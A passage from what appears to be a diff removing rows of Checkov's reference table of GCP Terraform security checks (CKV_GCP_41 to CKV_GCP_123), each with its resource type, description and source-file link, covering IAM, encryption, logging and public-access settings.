-| 1640 | CKV_GCP_41 | resource | google_project_iam_member | Ensure that IAM users are not assigned the Service Account User or Service Account Token Creator roles at project level | Terraform | [GoogleRoleServiceAccountUser.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleRoleServiceAccountUser.py) |
-| 1641 | CKV_GCP_42 | resource | google_project_iam_member | Ensure that Service Account has no Admin privileges | Terraform | [GoogleProjectAdminServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectAdminServiceAccount.py) |
-| 1642 | CKV_GCP_43 | resource | google_kms_crypto_key | Ensure KMS encryption keys are rotated within a period of 90 days | Terraform | [GoogleKMSRotationPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSRotationPeriod.py) |
-| 1643 | CKV_GCP_44 | resource | google_folder_iam_binding | Ensure no roles that enable to impersonate and manage all service accounts are used at a folder level | Terraform | [GoogleFolderImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderImpersonationRole.py) |
-| 1644 | CKV_GCP_44 | resource | google_folder_iam_member | Ensure no roles that enable to impersonate and manage all service accounts are used at a folder level | Terraform | [GoogleFolderImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderImpersonationRole.py) |
-| 1645 | CKV_GCP_45 | resource | google_organization_iam_binding | Ensure no roles that enable to impersonate and manage all service accounts are used at an organization level | Terraform | [GoogleOrgImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgImpersonationRole.py) |
-| 1646 | CKV_GCP_45 | resource | google_organization_iam_member | Ensure no roles that enable to impersonate and manage all service accounts are used at an organization level | Terraform | [GoogleOrgImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgImpersonationRole.py) |
-| 1647 | CKV_GCP_46 | resource | google_project_iam_binding | Ensure Default Service account is not used at a project level | Terraform | [GoogleProjectMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectMemberDefaultServiceAccount.py) |
-| 1648 | CKV_GCP_46 | resource | google_project_iam_member | Ensure Default Service account is not used at a project level | Terraform | [GoogleProjectMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectMemberDefaultServiceAccount.py) |
-| 1649 | CKV_GCP_47 | resource | google_organization_iam_binding | Ensure default service account is not used at an organization level | Terraform | [GoogleOrgMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgMemberDefaultServiceAccount.py) |
-| 1650 | CKV_GCP_47 | resource | google_organization_iam_member | Ensure default service account is not used at an organization level | Terraform | [GoogleOrgMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgMemberDefaultServiceAccount.py) |
-| 1651 | CKV_GCP_48 | resource | google_folder_iam_binding | Ensure Default Service account is not used at a folder level | Terraform | [GoogleFolderMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderMemberDefaultServiceAccount.py) |
-| 1652 | CKV_GCP_48 | resource | google_folder_iam_member | Ensure Default Service account is not used at a folder level | Terraform | [GoogleFolderMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderMemberDefaultServiceAccount.py) |
-| 1653 | CKV_GCP_49 | resource | google_project_iam_binding | Ensure roles do not impersonate or manage Service Accounts used at project level | Terraform | [GoogleProjectImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectImpersonationRole.py) |
-| 1654 | CKV_GCP_49 | resource | google_project_iam_member | Ensure roles do not impersonate or manage Service Accounts used at project level | Terraform | [GoogleProjectImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectImpersonationRole.py) |
-| 1655 | CKV_GCP_50 | resource | google_sql_database_instance | Ensure MySQL database 'local_infile' flag is set to 'off' | Terraform | [GoogleCloudMySqlLocalInfileOff.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudMySqlLocalInfileOff.py) |
-| 1656 | CKV_GCP_51 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_checkpoints' flag is set to 'on' | Terraform | [GoogleCloudPostgreSqlLogCheckpoints.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogCheckpoints.py) |
-| 1657 | CKV_GCP_52 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_connections' flag is set to 'on' | Terraform | [GoogleCloudPostgreSqlLogConnection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogConnection.py) |
-| 1658 | CKV_GCP_53 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_disconnections' flag is set to 'on' | Terraform | [GoogleCloudPostgreSqlLogDisconnection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogDisconnection.py) |
-| 1659 | CKV_GCP_54 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_lock_waits' flag is set to 'on' | Terraform | [GoogleCloudPostgreSqlLogLockWaits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogLockWaits.py) |
-| 1660 | CKV_GCP_55 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_min_messages' flag is set to a valid value | Terraform | [GoogleCloudPostgreSqlLogMinMessage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinMessage.py) |
-| 1661 | CKV_GCP_56 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_temp_files flag is set to '0' | Terraform | [GoogleCloudPostgreSqlLogTemp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogTemp.py) |
-| 1662 | CKV_GCP_57 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_min_duration_statement' flag is set to '-1' | Terraform | [GoogleCloudPostgreSqlLogMinDuration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinDuration.py) |
-| 1663 | CKV_GCP_58 | resource | google_sql_database_instance | Ensure SQL database 'cross db ownership chaining' flag is set to 'off' | Terraform | [GoogleCloudSqlServerCrossDBOwnershipChaining.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerCrossDBOwnershipChaining.py) |
-| 1664 | CKV_GCP_59 | resource | google_sql_database_instance | Ensure SQL database 'contained database authentication' flag is set to 'off' | Terraform | [GoogleCloudSqlServerContainedDBAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerContainedDBAuthentication.py) |
-| 1665 | CKV_GCP_60 | resource | google_sql_database_instance | Ensure Cloud SQL database does not have public IP | Terraform | [GoogleCloudSqlServerNoPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerNoPublicIP.py) |
-| 1666 | CKV_GCP_61 | resource | google_container_cluster | Enable VPC Flow Logs and Intranode Visibility | Terraform | [GKEEnableVPCFlowLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnableVPCFlowLogs.py) |
-| 1667 | CKV_GCP_62 | resource | google_storage_bucket | Bucket should log access | Terraform | [CloudStorageLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudStorageLogging.py) |
-| 1668 | CKV_GCP_63 | resource | google_storage_bucket | Bucket should not log to itself | Terraform | [CloudStorageSelfLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudStorageSelfLogging.py) |
-| 1669 | CKV_GCP_64 | resource | google_container_cluster | Ensure clusters are created with Private Nodes | Terraform | [GKEPrivateNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPrivateNodes.py) |
-| 1670 | CKV_GCP_65 | resource | google_container_cluster | Manage Kubernetes RBAC users with Google Groups for GKE | Terraform | [GKEKubernetesRBACGoogleGroups.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEKubernetesRBACGoogleGroups.py) |
-| 1671 | CKV_GCP_66 | resource | google_container_cluster | Ensure use of Binary Authorization | Terraform | [GKEBinaryAuthorization.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEBinaryAuthorization.py) |
-| 1672 | CKV_GCP_68 | resource | google_container_cluster | Ensure Secure Boot for Shielded GKE Nodes is Enabled | Terraform | [GKESecureBootforShieldedNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKESecureBootforShieldedNodes.py) |
-| 1673 | CKV_GCP_68 | resource | google_container_node_pool | Ensure Secure Boot for Shielded GKE Nodes is Enabled | Terraform | [GKESecureBootforShieldedNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKESecureBootforShieldedNodes.py) |
-| 1674 | CKV_GCP_69 | resource | google_container_cluster | Ensure the GKE Metadata Server is Enabled | Terraform | [GKEMetadataServerIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMetadataServerIsEnabled.py) |
-| 1675 | CKV_GCP_69 | resource | google_container_node_pool | Ensure the GKE Metadata Server is Enabled | Terraform | [GKEMetadataServerIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMetadataServerIsEnabled.py) |
-| 1676 | CKV_GCP_70 | resource | google_container_cluster | Ensure the GKE Release Channel is set | Terraform | [GKEReleaseChannel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEReleaseChannel.py) |
-| 1677 | CKV_GCP_71 | resource | google_container_cluster | Ensure Shielded GKE Nodes are Enabled | Terraform | [GKEEnableShieldedNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnableShieldedNodes.py) |
-| 1678 | CKV_GCP_72 | resource | google_container_cluster | Ensure Integrity Monitoring for Shielded GKE Nodes is Enabled | Terraform | [GKEEnsureIntegrityMonitoring.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnsureIntegrityMonitoring.py) |
-| 1679 | CKV_GCP_72 | resource | google_container_node_pool | Ensure Integrity Monitoring for Shielded GKE Nodes is Enabled | Terraform | [GKEEnsureIntegrityMonitoring.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnsureIntegrityMonitoring.py) |
-| 1680 | CKV_GCP_73 | resource | google_compute_security_policy | Ensure Cloud Armor prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | Terraform | [CloudArmorWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudArmorWAFACLCVE202144228.py) |
-| 1681 | CKV_GCP_74 | resource | google_compute_subnetwork | Ensure that private_ip_google_access is enabled for Subnet | Terraform | [GoogleSubnetworkPrivateGoogleEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleSubnetworkPrivateGoogleEnabled.py) |
-| 1682 | CKV_GCP_75 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted FTP access | Terraform | [GoogleComputeFirewallUnrestrictedIngress21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress21.py) |
-| 1683 | CKV_GCP_76 | resource | google_compute_subnetwork | Ensure that Private google access is enabled for IPV6 | Terraform | [GoogleSubnetworkIPV6PrivateGoogleEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleSubnetworkIPV6PrivateGoogleEnabled.py) |
-| 1684 | CKV_GCP_77 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow on ftp port | Terraform | [GoogleComputeFirewallUnrestrictedIngress20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress20.py) |
-| 1685 | CKV_GCP_78 | resource | google_storage_bucket | Ensure Cloud storage has versioning enabled | Terraform | [CloudStorageVersioningEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudStorageVersioningEnabled.py) |
-| 1686 | CKV_GCP_79 | resource | google_sql_database_instance | Ensure SQL database is using latest Major version | Terraform | [CloudSqlMajorVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudSqlMajorVersion.py) |
-| 1687 | CKV_GCP_80 | resource | google_bigquery_table | Ensure Big Query Tables are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [BigQueryTableEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryTableEncryptedWithCMK.py) |
-| 1688 | CKV_GCP_81 | resource | google_bigquery_dataset | Ensure Big Query Datasets are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [BigQueryDatasetEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryDatasetEncryptedWithCMK.py) |
-| 1689 | CKV_GCP_82 | resource | google_kms_crypto_key | Ensure KMS keys are protected from deletion | Terraform | [GoogleKMSPreventDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSPreventDestroy.py) |
-| 1690 | CKV_GCP_83 | resource | google_pubsub_topic | Ensure PubSub Topics are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [CloudPubSubEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudPubSubEncryptedWithCMK.py) |
-| 1691 | CKV_GCP_84 | resource | google_artifact_registry_repository | Ensure Artifact Registry Repositories are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [ArtifactRegsitryEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/ArtifactRegsitryEncryptedWithCMK.py) |
-| 1692 | CKV_GCP_85 | resource | google_bigtable_instance | Ensure Big Table Instances are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [BigTableInstanceEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigTableInstanceEncryptedWithCMK.py) |
-| 1693 | CKV_GCP_86 | resource | google_cloudbuild_worker_pool | Ensure Cloud build workers are private | Terraform | [CloudBuildWorkersArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudBuildWorkersArePrivate.py) |
-| 1694 | CKV_GCP_87 | resource | google_data_fusion_instance | Ensure Data fusion instances are private | Terraform | [DataFusionPrivateInstance.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataFusionPrivateInstance.py) |
-| 1695 | CKV_GCP_88 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted mysql access | Terraform | [GoogleComputeFirewallUnrestrictedIngress3306.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress3306.py) |
-| 1696 | CKV_GCP_89 | resource | google_notebooks_instance | Ensure Vertex AI instances are private | Terraform | [VertexAIPrivateInstance.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/VertexAIPrivateInstance.py) |
-| 1697 | CKV_GCP_90 | resource | google_dataflow_job | Ensure data flow jobs are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | 
[DataflowJobEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataflowJobEncryptedWithCMK.py) | -| 1698 | CKV_GCP_91 | resource | google_dataproc_cluster | Ensure Dataproc cluster is encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [DataprocClusterEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocClusterEncryptedWithCMK.py) | -| 1699 | CKV_GCP_92 | resource | google_vertex_ai_dataset | Ensure Vertex AI datasets uses a CMK (Customer Managed Key) | Terraform | [VertexAIDatasetEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/VertexAIDatasetEncryptedWithCMK.py) | -| 1700 | CKV_GCP_93 | resource | google_spanner_database | Ensure Spanner Database is encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [SpannerDatabaseEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/SpannerDatabaseEncryptedWithCMK.py) | -| 1701 | CKV_GCP_94 | resource | google_dataflow_job | Ensure Dataflow jobs are private | Terraform | [DataflowPrivateJob.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataflowPrivateJob.py) | -| 1702 | CKV_GCP_95 | resource | google_redis_instance | Ensure Memorystore for Redis has AUTH enabled | Terraform | [MemorystoreForRedisAuthEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/MemorystoreForRedisAuthEnabled.py) | -| 1703 | CKV_GCP_96 | resource | google_vertex_ai_metadata_store | Ensure Vertex AI Metadata Store uses a CMK (Customer Managed Key) | Terraform | [VertexAIMetadataStoreEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/VertexAIMetadataStoreEncryptedWithCMK.py) | -| 1704 | CKV_GCP_97 | resource | google_redis_instance | Ensure 
Memorystore for Redis uses intransit encryption | Terraform | [MemorystoreForRedisInTransitEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/MemorystoreForRedisInTransitEncryption.py) | -| 1705 | CKV_GCP_98 | resource | google_dataproc_cluster_iam_binding | Ensure that Dataproc clusters are not anonymously or publicly accessible | Terraform | [DataprocPrivateCluster.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocPrivateCluster.py) | -| 1706 | CKV_GCP_98 | resource | google_dataproc_cluster_iam_member | Ensure that Dataproc clusters are not anonymously or publicly accessible | Terraform | [DataprocPrivateCluster.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocPrivateCluster.py) | -| 1707 | CKV_GCP_99 | resource | google_pubsub_topic_iam_binding | Ensure that Pub/Sub Topics are not anonymously or publicly accessible | Terraform | [PubSubPrivateTopic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/PubSubPrivateTopic.py) | -| 1708 | CKV_GCP_99 | resource | google_pubsub_topic_iam_member | Ensure that Pub/Sub Topics are not anonymously or publicly accessible | Terraform | [PubSubPrivateTopic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/PubSubPrivateTopic.py) | -| 1709 | CKV_GCP_100 | resource | google_bigquery_table_iam_binding | Ensure that BigQuery Tables are not anonymously or publicly accessible | Terraform | [BigQueryPrivateTable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryPrivateTable.py) | -| 1710 | CKV_GCP_100 | resource | google_bigquery_table_iam_member | Ensure that BigQuery Tables are not anonymously or publicly accessible | Terraform | 
[BigQueryPrivateTable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryPrivateTable.py) | -| 1711 | CKV_GCP_101 | resource | google_artifact_registry_repository_iam_binding | Ensure that Artifact Registry repositories are not anonymously or publicly accessible | Terraform | [ArtifactRegistryPrivateRepo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/ArtifactRegistryPrivateRepo.py) | -| 1712 | CKV_GCP_101 | resource | google_artifact_registry_repository_iam_member | Ensure that Artifact Registry repositories are not anonymously or publicly accessible | Terraform | [ArtifactRegistryPrivateRepo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/ArtifactRegistryPrivateRepo.py) | -| 1713 | CKV_GCP_102 | resource | google_cloud_run_service_iam_binding | Ensure that GCP Cloud Run services are not anonymously or publicly accessible | Terraform | [GCPCloudRunPrivateService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GCPCloudRunPrivateService.py) | -| 1714 | CKV_GCP_102 | resource | google_cloud_run_service_iam_member | Ensure that GCP Cloud Run services are not anonymously or publicly accessible | Terraform | [GCPCloudRunPrivateService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GCPCloudRunPrivateService.py) | -| 1715 | CKV_GCP_103 | resource | google_dataproc_cluster | Ensure Dataproc Clusters do not have public IPs | Terraform | [DataprocPublicIpCluster.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocPublicIpCluster.py) | -| 1716 | CKV_GCP_104 | resource | google_data_fusion_instance | Ensure Datafusion has stack driver logging enabled | Terraform | 
[DataFusionStackdriverLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataFusionStackdriverLogs.py) | -| 1717 | CKV_GCP_105 | resource | google_data_fusion_instance | Ensure Datafusion has stack driver monitoring enabled | Terraform | [DataFusionStackdriverMonitoring.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataFusionStackdriverMonitoring.py) | -| 1718 | CKV_GCP_106 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted http port 80 access | Terraform | [GoogleComputeFirewallUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress80.py) | -| 1719 | CKV_GCP_107 | resource | google_cloudfunctions2_function_iam_binding | Cloud functions should not be public | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py) | -| 1720 | CKV_GCP_107 | resource | google_cloudfunctions2_function_iam_member | Cloud functions should not be public | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py) | -| 1721 | CKV_GCP_107 | resource | google_cloudfunctions_function_iam_binding | Cloud functions should not be public | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py) | -| 1722 | CKV_GCP_107 | resource | google_cloudfunctions_function_iam_member | Cloud functions should not be public | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py) | -| 1723 | CKV_GCP_108 | 
resource | google_sql_database_instance | Ensure hostnames are logged for GCP PostgreSQL databases | Terraform | [GoogleCloudPostgreSqlLogHostname.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogHostname.py) | -| 1724 | CKV_GCP_109 | resource | google_sql_database_instance | Ensure the GCP PostgreSQL database log levels are set to ERROR or lower | Terraform | [GoogleCloudPostgreSqlLogMinErrorStatement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinErrorStatement.py) | -| 1725 | CKV_GCP_110 | resource | google_sql_database_instance | Ensure pgAudit is enabled for your GCP PostgreSQL database | Terraform | [GoogleCloudPostgreSqlEnablePgaudit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlEnablePgaudit.py) | -| 1726 | CKV_GCP_111 | resource | google_sql_database_instance | Ensure GCP PostgreSQL logs SQL statements | Terraform | [GoogleCloudPostgreSqlLogStatement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogStatement.py) | -| 1727 | CKV_GCP_112 | resource | google_kms_crypto_key_iam_binding | Esnure KMS policy should not allow public access | Terraform | [GoogleKMSKeyIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSKeyIsPublic.py) | -| 1728 | CKV_GCP_112 | resource | google_kms_crypto_key_iam_member | Esnure KMS policy should not allow public access | Terraform | [GoogleKMSKeyIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSKeyIsPublic.py) | -| 1729 | CKV_GCP_112 | resource | google_kms_crypto_key_iam_policy | Esnure KMS policy should not allow public access | Terraform | 
[GoogleKMSKeyIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSKeyIsPublic.py) | -| 1730 | CKV_GCP_113 | data | google_iam_policy | Ensure IAM policy should not define public access | Terraform | [GooglePolicyIsPrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/gcp/GooglePolicyIsPrivate.py) | -| 1731 | CKV_GCP_114 | resource | google_storage_bucket | Ensure public access prevention is enforced on Cloud Storage bucket | Terraform | [GoogleStoragePublicAccessPrevention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStoragePublicAccessPrevention.py) | -| 1732 | CKV_GCP_115 | resource | google_organization_iam_binding | Ensure basic roles are not used at organization level. | Terraform | [GoogleOrgBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgBasicRole.py) | -| 1733 | CKV_GCP_115 | resource | google_organization_iam_member | Ensure basic roles are not used at organization level. | Terraform | [GoogleOrgBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgBasicRole.py) | -| 1734 | CKV_GCP_116 | resource | google_folder_iam_binding | Ensure basic roles are not used at folder level. | Terraform | [GoogleFolderBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderBasicRole.py) | -| 1735 | CKV_GCP_116 | resource | google_folder_iam_member | Ensure basic roles are not used at folder level. | Terraform | [GoogleFolderBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderBasicRole.py) | -| 1736 | CKV_GCP_117 | resource | google_project_iam_binding | Ensure basic roles are not used at project level. 
| Terraform | [GoogleProjectBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectBasicRole.py) | -| 1737 | CKV_GCP_117 | resource | google_project_iam_member | Ensure basic roles are not used at project level. | Terraform | [GoogleProjectBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectBasicRole.py) | -| 1738 | CKV_GCP_118 | resource | google_iam_workload_identity_pool_provider | Ensure IAM workload identity pool provider is restricted | Terraform | [GoogleIAMWorkloadIdentityConditional.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleIAMWorkloadIdentityConditional.py) | -| 1739 | CKV_GCP_119 | resource | google_spanner_database | Ensure Spanner Database has deletion protection enabled | Terraform | [SpannerDatabaseDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/SpannerDatabaseDeletionProtection.py) | -| 1740 | CKV_GCP_120 | resource | google_spanner_database | Ensure Spanner Database has drop protection enabled | Terraform | [SpannerDatabaseDropProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/SpannerDatabaseDropProtection.py) | -| 1741 | CKV_GCP_121 | resource | google_bigquery_table | Ensure BigQuery tables have deletion protection enabled | Terraform | [BigQueryTableDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryTableDeletionProtection.py) | -| 1742 | CKV_GCP_122 | resource | google_bigtable_instance | Ensure Big Table Instances have deletion protection enabled | Terraform | [BigTableInstanceDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigTableInstanceDeletionProtection.py) | -| 1743 | CKV_GCP_123 | resource | google_container_cluster | 
